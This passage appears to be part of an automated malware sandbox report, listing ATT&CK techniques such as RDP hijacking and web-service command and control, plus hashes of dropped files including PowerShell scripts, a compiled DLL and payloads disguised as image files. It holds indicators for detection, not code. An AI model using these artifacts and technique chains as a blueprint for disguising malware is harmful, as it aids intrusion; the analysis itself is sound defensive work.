System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Guardatelo.tif

Filesize
6.0MB

MD5
781b1a967dbdc2aecf3ca4bf35ee91f0

SHA1
4eeb1e4b9c2a187d26aa182bcd29749339a2ed9c

SHA256
e3ef8d5641a303ccd7b0ec22bdb8f1bf4293aeb8e5e3c2c4a8da6521b41c754b

SHA512
677c09cb87b99ec0848cbbed7f579cf326377db0e271a61ed1bc7972efa0c3b9c55cbecaed564b56a55f0185c5bf6ec69d9b8652fb88d0f73899a9d31c0e8634

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Rimanete.tif

Filesize
463B

MD5
944eb6ec2b54658c347fae484653c95c

SHA1
dd75d4481f1f650556903ae11bd83b5bab125c94

SHA256
957495369445d1d6a0451a2fcf054ad420dfdcabb1cd2582da38ce05297ee1ed

SHA512
3674d697b1e1e1ceeb1abf1ac9c9765984e15cd47bd156268465230ef9b3898487296b2eabf3676b916ca4cf5b2a65ad3914becc02ab9bb40002db4b93a09935

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Rossore.tif

Filesize
940KB

MD5
bdc3a83f50b7f876bef34e709c6658d9

SHA1
e655e8feeb364927edc8223adf18149743496c03

SHA256
7772aa3829f08ff502e203a681c22d83f2c9feca6cd466a709795daffbf47e37

SHA512
4725dd51841eea4fce09b603e1cd9ccd7e370dac8cc88c0def6909b791cc04dfd8a5ca83939d910b40012c4bfde0c40c522f22aecb61893da5c8e7fbe62666e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vedevo.tif

Filesize
1.0MB

MD5
48f2a2475baace65ab8fd6259ec101ed

SHA1
af695e8ec4aec796eeab78a635935c433e8a9265

SHA256
bcafb09b6a3096a5ad07987344b837c5050a285e05af1446bf83f8ea7c5edff4

SHA512
16ef5fe57b430d7f67c2cd43f6cb1991d84f3b083a7618d77f0ab1cc1735f2982c7ade7ef79677c1d0884f54cc2c69ee7564432998266bec4b7f295e9a4e3004

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES49ED.tmp

Filesize
1KB

MD5
ceff08351cfaa93d2d1680e88a25816c

SHA1
15fad7b0c2962d18c516369e0119fe551dd61841

SHA256
da6ffcd7a26dfe73e27a4326cb03fbeaf453ffe506edc12ea9579e7204399468

SHA512
1bd09cf61f434b1beb2ac8819e816392090fd3acd242d68722dd0421862c7d1b5d1958dd2a8f33d9fa8429e206900e014a0aef6d5a23936d7b3028557028a4dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\doixlofc.dll

Filesize
3KB

MD5
78273c322e8e9401e434b5ff44002ddb

SHA1
85daf9e7e6fe92fbdddc240581757f2d39da7beb

SHA256
cd09cae15253b7711ba8285e3e608b7359369214188184df8883ab25b4f2090a

SHA512
9a8eb54eaaa6c61754c49b45c4507b44e4a34cae3a5ed3e26f65f1e06d8ccae1469bb27ba1fe7daf22101a79f1cb4086edd7ac526ac6d93aac36ebb4d9d58258

Download Submit
C:\Users\Admin\AppData\Local\Temp\doixlofc.pdb

Filesize
7KB

MD5
f22a8f11bd20c6ec22e1794f37d69c77

SHA1
63cd45f19c39b1bdf8c5d1e25fe57ffab2d29c6a

SHA256
a5bfa0194f67df740d37c6de7f756b37b217e9bbc161d4f4c5a3130c6987e40e

SHA512
b99b897ec2b9465eaafed2eb75e189f3f413179fb002578c5a4eba17d46cc53fb4082dcd032c4ea16642535e77c5c467f1c49ef3555905a2655e05e4c4a54c03

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
213fdd5024c816a8d22dc7c860a850ad

SHA1
9ed04e6f30e6c1a1d8c1dea7b216541c2bec674d

SHA256
786ab83aa960b0d85e8ef620a176ae358700bbb1060bc7c261a1de7ebc524cb3

SHA512
bcb938661f4e1c37c886ff513576cd3eabe1336f957565f43211760e1970473061559bf21e1b736e260f36fe9ee7c33a06bd6ca00944c9051003a55377e7c0e1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ee5917d305e5f67373c44a85a132d70f

SHA1
ac57cce1a0f21f850a60125ff8b1d27d0531821b

SHA256
8e8b0f9373d2a78edd63d2ef361f5a8ee5f5cafa498ef958bac2b6bff0c7eccf

SHA512
417ec69e9fc915d31b283f68ac7e88aac8efb5fe293d26ad6461ae1f6c768d56b3b1492bae5604023a7955449ba1e2b9945d9d924ccf222148a35a5a2af98776

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC49EC.tmp

Filesize
652B

MD5
88e818ee11153a3aae8d6d0a81fd8575

SHA1
ff41b407a5b68c4bbc7e02e2f654235690388e15

SHA256
fb250066b77053df6ae52ca08f65542e0f32c676d8977379ebd5f8793527d73e

SHA512
88f2c96624446da197449d14e7efa7d04520fad5cdd506a25ca63bd0bd249a3b54f7a3d8ab94cf59b20de1934536e62e2fac9bc2c78586b35f08f1f9b9a2d9cd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\doixlofc.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\doixlofc.cmdline

Filesize
309B

MD5
0741be7cf88cf9e83932559724682b80

SHA1
1f218f54d18f537422e75a797f6357ed56f3eac3

SHA256
bdbb2a65a2b11a9aba29d2642070b477ad0330184a79ba69bea3dfb7b1d83c28

SHA512
a2cca71bfc982a3852e17660721a6a786808c73fcbbdbf9cea7ada3487de60f0b8402051c2b542ed742ad39443270da857252aa0d8c321807e8bf5a5b139a098

Download Submit
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com

Filesize
1.0MB

MD5
f83ab141e29899ceb5308dabde894a0e

SHA1
6ea46bb7102125fa5d39b77547dab28ec346e9f9

SHA256
ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99

SHA512
d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
2b5fbe9cdc001b5392071201f67373c0

SHA1
e3a000fa384e3ecfe2e999c6d1ddfbbfe91b24bc

SHA256
5840c4dc2d881bc79dcd4c5cb870d59475451b5a54af3b9dc66f18a03cc59812

SHA512
35fb2d86d902472b24f2593ec4a74f73d0f1b95becdc8b7f3c118ff8685ca20d56732aec2158e782c2c39b10ab66d0863ff6cbbfeeccfe93c3d732e87a2c696c

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
ac538603c13cf29bfbe122afc05431b7

SHA1
b0dbd1ec47b343a2caf1c533e3fa5d991134273b

SHA256
b7ed879e2bf45385fda562fee8a4d57e5db77dcbb21952fde8b1955e1bc6b03d

SHA512
4cb57a76d07ea519819744783aa7e584e471d2d6ca7dc97752ef267642ec3e6725837598e7aca488252bf7b00d4fe41816b04d9f69d26c044b5df6c37ecf26d6

Download Submit
memory/1664-43-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/1664-58-0x00000000029F0000-0x00000000029F8000-memory.dmp

Filesize
32KB

Download
memory/1664-42-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/1664-63-0x0000000002AD0000-0x0000000002B02000-memory.dmp

Filesize
200KB

Download
memory/1664-62-0x0000000002AD0000-0x0000000002B02000-memory.dmp

Filesize
200KB

Download
memory/2700-25-0x0000000000610000-0x0000000000C68000-memory.dmp

Filesize
6.3MB

Download
memory/2700-33-0x0000000000610000-0x0000000000C68000-memory.dmp

Filesize
6.3MB

Download
memory/2700-30-0x0000000000610000-0x0000000000C68000-memory.dmp

Filesize
6.3MB

Download
memory/2700-26-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/2700-27-0x0000000000610000-0x0000000000C68000-memory.dmp

Filesize
6.3MB

Download
memory/2700-35-0x0000000042FF0000-0x0000000043416000-memory.dmp

Filesize
4.1MB

Download
memory/2700-34-0x0000000000610000-0x0000000000C68000-memory.dmp

Filesize
6.3MB

Download
memory/2700-31-0x0000000000610000-0x0000000000C68000-memory.dmp

Filesize
6.3MB

Download
memory/2700-32-0x0000000000610000-0x0000000000C68000-memory.dmp

Filesize
6.3MB

Download
memory/2700-103-0x0000000000610000-0x0000000000C68000-memory.dmp

Filesize
6.3MB

Download